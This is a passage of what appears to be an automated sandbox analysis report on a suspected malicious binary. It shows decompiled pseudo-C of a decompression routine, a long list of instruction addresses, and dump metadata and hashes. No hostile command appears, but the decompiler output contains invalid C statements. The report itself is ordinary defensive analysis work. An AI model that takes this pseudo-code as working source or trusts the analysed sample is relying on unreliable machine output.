												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                          0x00406768
                          0x00406768
                          0x00406768
                          0x00406768
                          0x0040676e
                          0x00406772
                          0x00406776
                          0x00406780
                          0x0040678e
                          0x00406a64
                          0x00406a64
                          0x00406a67
                          0x00406a6e
                          0x00406a9b
                          0x00406a9b
                          0x00406a9f
                          0x00000000
                          0x00000000
                          0x00406aa1
                          0x00406aaa
                          0x00406ab0
                          0x00406ab3
                          0x00406ab6
                          0x00406ab9
                          0x00406abc
                          0x00406ac2
                          0x00406adb
                          0x00406ade
                          0x00406aea
                          0x00406aeb
                          0x00406aee
                          0x00406ac4
                          0x00406ac4
                          0x00406ad3
                          0x00406ad6
                          0x00406ad6
                          0x00406af8
                          0x00406a98
                          0x00406a98
                          0x00406a98
                          0x00406a9b
                          0x00406a9f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406afa
                          0x00406afa
                          0x00406a73
                          0x00406a77
                          0x00406baf
                          0x00406baf
                          0x00406bb9
                          0x00406bc1
                          0x00406bc8
                          0x00406bca
                          0x00406bd1
                          0x00406bd5
                          0x00406bd5
                          0x00406a7d
                          0x00406a83
                          0x00406a8a
                          0x00406a92
                          0x00406a92
                          0x00406a95
                          0x00000000
                          0x00406a95
                          0x00406aff
                          0x00406b0c
                          0x00406b0f
                          0x00406a1b
                          0x00406a1b
                          0x00406a1b
                          0x004061b7
                          0x004061b7
                          0x004061b7
                          0x004061c0
                          0x00000000
                          0x00000000
                          0x004061c6
                          0x004061c6
                          0x00000000
                          0x004061cd
                          0x004061d1
                          0x00000000
                          0x00000000
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e4
                          0x00000000
                          0x00000000
                          0x004061ea
                          0x004061ea
                          0x004061ed
                          0x004061ef
                          0x004061f0
                          0x004061f3
                          0x004061f5
                          0x004061f6
                          0x004061f8
                          0x004061fb
                          0x00406200
                          0x00406205
                          0x0040620e
                          0x00406221
                          0x00406224
                          0x00406230
                          0x00406258
                          0x0040625a
                          0x00406268
                          0x00406268
                          0x0040626c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040625c
                          0x0040625c
                          0x0040625f
                          0x00406260
                          0x00406260
                          0x00000000
                          0x0040625c
                          0x00406232
                          0x00406236
                          0x0040623b
                          0x0040623b
                          0x00406244
                          0x0040624c
                          0x0040624f
                          0x00000000
                          0x00406255
                          0x00406255
                          0x00000000
                          0x00406255
                          0x00000000
                          0x00406272
                          0x00406272
                          0x00406276
                          0x00406b22
                          0x00406b22
                          0x00000000
                          0x00406b22
                          0x0040627c
                          0x0040627f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406295
                          0x00406295
                          0x00406298
                          0x0040629c
                          0x00000000
                          0x00000000
                          0x0040629e
                          0x0040629e
                          0x004062a4
                          0x004062ce
                          0x004062d4
                          0x004062db
                          0x00000000
                          0x004062db
                          0x004062a6
                          0x004062aa
                          0x004062ad
                          0x004062b2
                          0x004062b2
                          0x004062bd
                          0x004062c5
                          0x004062c8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040630d
                          0x00406313
                          0x00406316
                          0x00406323
                          0x0040632b
                          0x00000000
                          0x00000000
                          0x004062e2
                          0x004062e2
                          0x004062e6
                          0x00406b31
                          0x00406b31
                          0x00000000
                          0x00406b31
                          0x004062ec
                          0x004062f2
                          0x004062fd
                          0x004062fd
                          0x004062fd
                          0x00406300
                          0x00406303
                          0x00406306
                          0x0040630b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004069a2
                          0x004069a2
                          0x004069a8
                          0x004069ae
                          0x004069b4
                          0x004069ce
                          0x004069d1
                          0x004069d7
                          0x004069e2
                          0x004069e2
                          0x004069e4
                          0x004069b6
                          0x004069b6
                          0x004069c5
                          0x004069c9
                          0x004069c9
                          0x004069ee
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004069f0
                          0x004069f4
                          0x00406ba3
                          0x00406ba3
                          0x00000000
                          0x00406ba3
                          0x004069fa
                          0x00406a00
                          0x00406a07
                          0x00406a0f
                          0x00406a12
                          0x00406a15
                          0x00406a15
                          0x00406a1b
                          0x00406a1b
                          0x00000000
                          0x00000000
                          0x00406333
                          0x00406333
                          0x00406335
                          0x00406338
                          0x004063a9
                          0x004063a9
                          0x004063ac
                          0x004063af
                          0x004063b6
                          0x004063c0
                          0x00000000
                          0x004063c0
                          0x0040633a
                          0x0040633a
                          0x0040633e
                          0x00406341
                          0x00406343
                          0x00406346
                          0x00406349
                          0x0040634b
                          0x0040634e
                          0x00406350
                          0x00406355
                          0x00406358
                          0x0040635b
                          0x0040635f
                          0x00406366
                          0x00406369
                          0x00406370
                          0x00406374
                          0x0040637c
                          0x0040637c
                          0x0040637c
                          0x00406376
                          0x00406376
                          0x00406376
                          0x0040636b
                          0x0040636b
                          0x0040636b
                          0x00406380
                          0x00406383
                          0x004063a1
                          0x004063a1
                          0x004063a3
                          0x00000000
                          0x00406385
                          0x00406385
                          0x00406385
                          0x00406388
                          0x0040638b
                          0x0040638e
                          0x00406390
                          0x00406390
                          0x00406390
                          0x00406393
                          0x00406396
                          0x00406398
                          0x00406399
                          0x0040639c
                          0x00000000
                          0x0040639c
                          0x00000000
                          0x004065d2
                          0x004065d2
                          0x004065d6
                          0x004065f4
                          0x004065f4
                          0x004065f7
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x00406607
                          0x0040660a
                          0x0040660d
                          0x0040660f
                          0x00406616
                          0x00406617
                          0x00406619
                          0x0040661c
                          0x0040661f
                          0x00406622
                          0x00406622
                          0x00406627
                          0x00000000
                          0x00406627
                          0x004065d8
                          0x004065d8
                          0x004065db
                          0x004065de
                          0x004065e8
                          0x00000000
                          0x00000000
                          0x0040663c
                          0x0040663c
                          0x00406640
                          0x00406663
                          0x00406666
                          0x00406669
                          0x00406673
                          0x00406642
                          0x00406642
                          0x00406645
                          0x00406648
                          0x0040664b
                          0x00406658
                          0x0040665b
                          0x0040665b
                          0x00000000
                          0x00000000
                          0x0040667f
                          0x0040667f
                          0x00406683
                          0x00000000
                          0x00000000
                          0x00406689
                          0x00406689
                          0x0040668d
                          0x00000000
                          0x00000000
                          0x00406693
                          0x00406693
                          0x00406695
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x004066a0
                          0x00000000
                          0x00000000
                          0x004066f0
                          0x004066f0
                          0x004066f4
                          0x004066fb
                          0x004066fb
                          0x004066fe
                          0x00406701
                          0x0040670b
                          0x00000000
                          0x0040670b
                          0x004066f6
                          0x004066f6
                          0x00000000
                          0x00000000
                          0x00406717
                          0x00406717
                          0x0040671b
                          0x00406722
                          0x00406725
                          0x00406728
                          0x0040671d
                          0x0040671d
                          0x0040671d
                          0x0040672b
                          0x0040672e
                          0x00406731
                          0x00406731
                          0x00406734
                          0x00406737
                          0x0040673a
                          0x0040673a
                          0x0040673d
                          0x00406744
                          0x00406749
                          0x00000000
                          0x00000000
                          0x004067d7
                          0x004067d7
                          0x004067db
                          0x00406b79
                          0x00406b79
                          0x00000000
                          0x00406b79
                          0x004067e1
                          0x004067e1
                          0x004067e4
                          0x004067e7
                          0x004067eb
                          0x004067ee
                          0x004067f4
                          0x004067f6
                          0x004067f6
                          0x004067f6
                          0x004067f9
                          0x004067fc
                          0x00000000
                          0x00000000
                          0x004063cc
                          0x004063cc
                          0x004063d0
                          0x00406b3d
                          0x00406b3d
                          0x00000000
                          0x00406b3d
                          0x004063d6
                          0x004063d6
                          0x004063d9
                          0x004063dc
                          0x004063e0
                          0x004063e3
                          0x004063e9
                          0x004063eb
                          0x004063eb
                          0x004063eb
                          0x004063ee
                          0x004063f1
                          0x004063f1
                          0x004063f4
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x004063fd
                          0x004063fd
                          0x00406403
                          0x00000000
                          0x00000000
                          0x00406409
                          0x00406409
                          0x0040640d
                          0x00406410
                          0x00406413
                          0x00406416
                          0x00406419
                          0x0040641a
                          0x0040641d
                          0x0040641f
                          0x00406425
                          0x00406428
                          0x0040642b
                          0x0040642e
                          0x00406431
                          0x00406434
                          0x00406437
                          0x00406453
                          0x00406456
                          0x00406459
                          0x0040645c
                          0x00406463
                          0x00406467
                          0x00406469
                          0x0040646d
                          0x00406439
                          0x00406439
                          0x0040643d
                          0x00406445
                          0x0040644a
                          0x0040644c
                          0x0040644e
                          0x0040644e
                          0x00406470
                          0x00406477
                          0x0040647a
                          0x00000000
                          0x00406480
                          0x00406480
                          0x00000000
                          0x00406480
                          0x00000000
                          0x00406485
                          0x00406485
                          0x00406489
                          0x00406b49
                          0x00406b49
                          0x00000000
                          0x00406b49
                          0x0040648f
                          0x0040648f
                          0x00406492
                          0x00406495
                          0x00406499
                          0x0040649c
                          0x004064a2
                          0x004064a4
                          0x004064a4
                          0x004064a4
                          0x004064a7
                          0x004064aa
                          0x004064aa
                          0x004064aa
                          0x004064b0
                          0x00000000
                          0x00000000
                          0x004064b2
                          0x004064b2
                          0x004064b5
                          0x004064b8
                          0x004064bb
                          0x004064be
                          0x004064c1
                          0x004064c4
                          0x004064c7
                          0x004064ca
                          0x004064cd
                          0x004064d0
                          0x004064e8
                          0x004064eb
                          0x004064ee
                          0x004064f1
                          0x004064f1
                          0x004064f4
                          0x004064f8
                          0x004064fa
                          0x004064d2
                          0x004064d2
                          0x004064da
                          0x004064df
                          0x004064e1
                          0x004064e3
                          0x004064e3
                          0x004064fd
                          0x00406504
                          0x00406507
                          0x00000000
                          0x00406509
                          0x00406509
                          0x00000000
                          0x00406509
                          0x00406507
                          0x0040650e
                          0x0040650e
                          0x0040650e
                          0x0040650e
                          0x00000000
                          0x00000000
                          0x00406549
                          0x00406549
                          0x0040654d
                          0x00406b55
                          0x00406b55
                          0x00000000
                          0x00406b55
                          0x00406553
                          0x00406553
                          0x00406556
                          0x00406559
                          0x0040655d
                          0x00406560
                          0x00406566
                          0x00406568
                          0x00406568
                          0x00406568
                          0x0040656b
                          0x0040656e
                          0x0040656e
                          0x00406574
                          0x00406512
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00406515
                          0x00406576
                          0x00406576
                          0x00406579
                          0x0040657c
                          0x0040657f
                          0x00406582
                          0x00406585
                          0x00406588
                          0x0040658b
                          0x0040658e
                          0x00406591
                          0x00406594
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b5
                          0x004065b8
                          0x004065bc
                          0x004065be
                          0x00406596
                          0x00406596
                          0x0040659e
                          0x004065a3
                          0x004065a5
                          0x004065a7
                          0x004065a7
                          0x004065c1
                          0x004065c8
                          0x004065cb
                          0x00000000
                          0x004065cd
                          0x004065cd
                          0x00000000
                          0x004065cd
                          0x00000000
                          0x0040685a
                          0x0040685a
                          0x0040685e
                          0x00406b85
                          0x00406b85
                          0x00000000
                          0x00406b85
                          0x00406864
                          0x00406864
                          0x00406867
                          0x0040686a
                          0x0040686e
                          0x00406871
                          0x00406877
                          0x00406879
                          0x00406879
                          0x00406879
                          0x0040687c
                          0x00000000
                          0x00000000
                          0x0040662a
                          0x0040662a
                          0x0040662d
                          0x00000000
                          0x00000000
                          0x00406969
                          0x00406969
                          0x0040696d
                          0x0040698f
                          0x0040698f
                          0x00406992
                          0x0040699c
                          0x0040699f
                          0x0040699f
                          0x00000000
                          0x0040699f
                          0x0040696f
                          0x0040696f
                          0x00406972
                          0x00406976
                          0x00406979
                          0x00406979
                          0x0040697c
                          0x00000000
                          0x00000000
                          0x00406a26
                          0x00406a26
                          0x00406a2a
                          0x00406a48
                          0x00406a48
                          0x00406a48
                          0x00406a48
                          0x00406a4f
                          0x00406a56
                          0x00406a5d
                          0x00406a5d
                          0x00406a64
                          0x00406a67
                          0x00406a6e
                          0x00000000
                          0x00406a71
                          0x00406a2c
                          0x00406a2c
                          0x00406a2f
                          0x00406a32
                          0x00406a35
                          0x00406a3c
                          0x00406980
                          0x00406980
                          0x00406983
                          0x00000000
                          0x00000000
                          0x00406b17
                          0x00406b17
                          0x00406b1a
                          0x00406a1b
                          0x00406a1b
                          0x00406a1b
                          0x00000000
                          0x00406a21
                          0x00000000
                          0x00406751
                          0x00406751
                          0x00406753
                          0x0040675a
                          0x0040675b
                          0x0040675d
                          0x00406760
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406a64
                          0x00406a64
                          0x00406a67
                          0x00406a6e
                          0x00000000
                          0x00406a71
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406796
                          0x00406796
                          0x00406799
                          0x004067cf
                          0x004067cf
                          0x004068ff
                          0x004068ff
                          0x004068ff
                          0x004068ff
                          0x00406902
                          0x00406902
                          0x00406905
                          0x00406907
                          0x00406b91
                          0x00406b91
                          0x00000000
                          0x00406b91
                          0x0040690d
                          0x0040690d
                          0x00406910
                          0x00000000
                          0x00000000
                          0x00406916
                          0x00406916
                          0x0040691a
                          0x0040691d
                          0x0040691d
                          0x0040691d
                          0x00000000
                          0x0040691d
                          0x0040679b
                          0x0040679b
                          0x0040679d
                          0x0040679f
                          0x004067a1
                          0x004067a4
                          0x004067a5
                          0x004067a7
                          0x004067a9
                          0x004067ac
                          0x004067af
                          0x004067c5
                          0x004067c5
                          0x004067ca
                          0x00406802
                          0x00406802
                          0x00406806
                          0x0040682f
                          0x00406832
                          0x00406834
                          0x0040683b
                          0x0040683e
                          0x00406841
                          0x00406841
                          0x00406846
                          0x00406846
                          0x00406848
                          0x0040684b
                          0x00406852
                          0x00406855
                          0x00406882
                          0x00406882
                          0x00406885
                          0x00406888
                          0x004068fc
                          0x004068fc
                          0x004068fc
                          0x004068fc
                          0x00000000
                          0x004068fc
                          0x0040688a
                          0x0040688a
                          0x00406890
                          0x00406893
                          0x00406896
                          0x00406899
                          0x0040689c
                          0x0040689f
                          0x004068a2
                          0x004068a5
                          0x004068a8
                          0x004068ab
                          0x004068c4
                          0x004068c6
                          0x004068c9
                          0x004068ca
                          0x004068cd
                          0x004068cf
                          0x004068d2
                          0x004068d4
                          0x004068d6
                          0x004068d9
                          0x004068db
                          0x004068de
                          0x004068e2
                          0x004068e4
                          0x004068e4
                          0x004068e5
                          0x004068e8
                          0x004068eb
                          0x004068ad
                          0x004068ad
                          0x004068b5
                          0x004068ba
                          0x004068bc
                          0x004068bf
                          0x004068bf
                          0x004068ee
                          0x004068f5
                          0x0040687f
                          0x0040687f
                          0x0040687f
                          0x0040687f
                          0x00000000
                          0x004068f7
                          0x004068f7
                          0x00000000
                          0x004068f7
                          0x004068f5
                          0x00406808
                          0x00406808
                          0x0040680b
                          0x0040680d
                          0x00406810
                          0x00406813
                          0x00406816
                          0x00406818
                          0x0040681b
                          0x0040681e
                          0x0040681e
                          0x00406821
                          0x00406821
                          0x00406824
                          0x0040682b
                          0x004067ff
                          0x004067ff
                          0x004067ff
                          0x004067ff
                          0x00000000
                          0x0040682d
                          0x0040682d
                          0x00000000
                          0x0040682d
                          0x0040682b
                          0x004067b1
                          0x004067b1
                          0x004067b4
                          0x004067b6
                          0x004067b9
                          0x00000000
                          0x00000000
                          0x00406518
                          0x00406518
                          0x0040651c
                          0x00406b61
                          0x00406b61
                          0x00000000
                          0x00406b61
                          0x00406522
                          0x00406522
                          0x00406525
                          0x00406528
                          0x0040652b
                          0x0040652e
                          0x00406531
                          0x00406534
                          0x00406536
                          0x00406539
                          0x0040653c
                          0x0040653f
                          0x00406541
                          0x00406541
                          0x00406541
                          0x00000000
                          0x00000000
                          0x004066a3
                          0x004066a3
                          0x004066a7
                          0x00406b6d
                          0x00406b6d
                          0x00000000
                          0x00406b6d
                          0x004066ad
                          0x004066ad
                          0x004066b0
                          0x004066b3
                          0x004066b6
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x004066bb
                          0x004066be
                          0x004066c1
                          0x004066c4
                          0x004066c7
                          0x004066ca
                          0x004066cb
                          0x004066cd
                          0x004066cd
                          0x004066cd
                          0x004066d0
                          0x004066d3
                          0x004066d6
                          0x004066d9
                          0x004066d9
                          0x004066d9
                          0x004066dc
                          0x004066de
                          0x004066de
                          0x00000000
                          0x00000000
                          0x00406920
                          0x00406920
                          0x00406920
                          0x00406924
                          0x00000000
                          0x00000000
                          0x0040692a
                          0x0040692a
                          0x0040692d
                          0x00406930
                          0x00406933
                          0x00406935
                          0x00406935
                          0x00406935
                          0x00406938
                          0x0040693b
                          0x0040693e
                          0x00406941
                          0x00406944
                          0x00406947
                          0x00406948
                          0x0040694a
                          0x0040694a
                          0x0040694a
                          0x0040694d
                          0x00406950
                          0x00406953
                          0x00406956
                          0x00406959
                          0x0040695d
                          0x0040695f
                          0x00406962
                          0x00000000
                          0x00406964
                          0x00406964
                          0x004066e1
                          0x004066e1
                          0x00000000
                          0x004066e1
                          0x00406962
                          0x00406b97
                          0x00406b97
                          0x00000000
                          0x00000000
                          0x004061c6
                          0x00406bce
                          0x00406bce
                          0x00000000
                          0x00406bce
                          0x00406a1b
                          0x00406a9b
                          0x00406a64

                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9f777e2b5f047ff5fac18a6b7d4eccb0398312e185884248bc8ff9efca1ede3f
                          • Instruction ID: 0a364959098a1219693739684ad0890dad76377db1f96b1360ce1028e8ac0eba
                          • Opcode Fuzzy Hash: 9f777e2b5f047ff5fac18a6b7d4eccb0398312e185884248bc8ff9efca1ede3f
                          • Instruction Fuzzy Hash: 7EA15371E00229CBDF28DFA8C8447ADBBB1FB45305F11816ED816BB281C7786A96DF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00406969 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                          Download Yara Rule
                          C-Code - Quality: 98%
                          			E00406969() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
